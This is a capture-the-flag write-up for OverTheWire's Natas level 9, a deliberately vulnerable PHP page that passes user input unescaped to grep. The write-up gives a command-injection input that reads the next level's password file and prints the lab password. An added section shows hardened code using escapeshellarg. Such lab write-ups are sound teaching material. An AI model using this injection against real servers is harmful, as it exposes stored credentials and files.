[OverTheWire] Natas – Level 09
http://natas9.natas.labs.overthewire.org/
Find words containing…
Click View sourcecode:
```php
<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    passthru("grep -i $key dictionary.txt");
}
?>
```
The grep command syntax can be found at:
Information provided from the start:
Each level has access to the password of the next level. Your job is to somehow obtain that next password and level up. All passwords are also stored in /etc/natas_webpass/. E.g. the password for natas5 is stored in the file /etc/natas_webpass/natas5 and only readable by natas4 and natas5.
Because the $key variable is not escaped, we can inject with the following input:
'' /etc/natas_webpass/natas10;
Result:
nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu
→ flag = nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu.
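The fix for the unescaped $key described above, as an added example that is not part of the original write-up or the challenge's own code: one variant keeps grep but passes the needle as a single quoted argument, the other avoids the shell entirely. The function names `build_grep_command` and `search_dictionary` and the sample dictionary contents are assumptions made for this illustration.

```php
<?php
// Added example: two hardened variants of the dictionary lookup.

// Variant 1: keep grep, but make the needle exactly one shell argument.
function build_grep_command(string $needle, string $file): string
{
    // -F : treat the needle as a fixed string, not a regex
    // -e : the next argument is the pattern, even if it starts with "-"
    // -- : end of options, so the file name can never be parsed as a flag
    return "grep -i -F -e " . escapeshellarg($needle)
         . " -- " . escapeshellarg($file);
}

// Variant 2: no shell at all; case-insensitive substring match in PHP.
function search_dictionary(string $needle, string $file): array
{
    if ($needle === "") {
        return [];
    }
    $hits = [];
    foreach (file($file, FILE_IGNORE_NEW_LINES) as $word) {
        if (stripos($word, $needle) !== false) {
            $hits[] = $word;
        }
    }
    return $hits;
}

// Constructed sample dictionary so the script runs offline.
$dict = tempnam(sys_get_temp_dir(), "dict");
file_put_contents($dict, "apple\nPineapple\nbanana\n");

// First input is a normal search; second is the input from the write-up.
$inputs = ["apple", "'' /etc/natas_webpass/natas10;"];
foreach ($inputs as $needle) {
    // In a web handler, also reject non-string values of $_REQUEST["needle"]
    // (e.g. needle[]=x arrives as an array) before calling either function.
    echo "needle: $needle\n";
    echo "  command: " . build_grep_command($needle, $dict) . "\n";
    echo "  no-shell hits: " . implode(",", search_dictionary($needle, $dict)) . "\n";
}
unlink($dict);
```

With `escapeshellarg()` the whole input, including the quotes, the space and the `;`, reaches grep as one literal pattern, so the second file path is never seen as an argument.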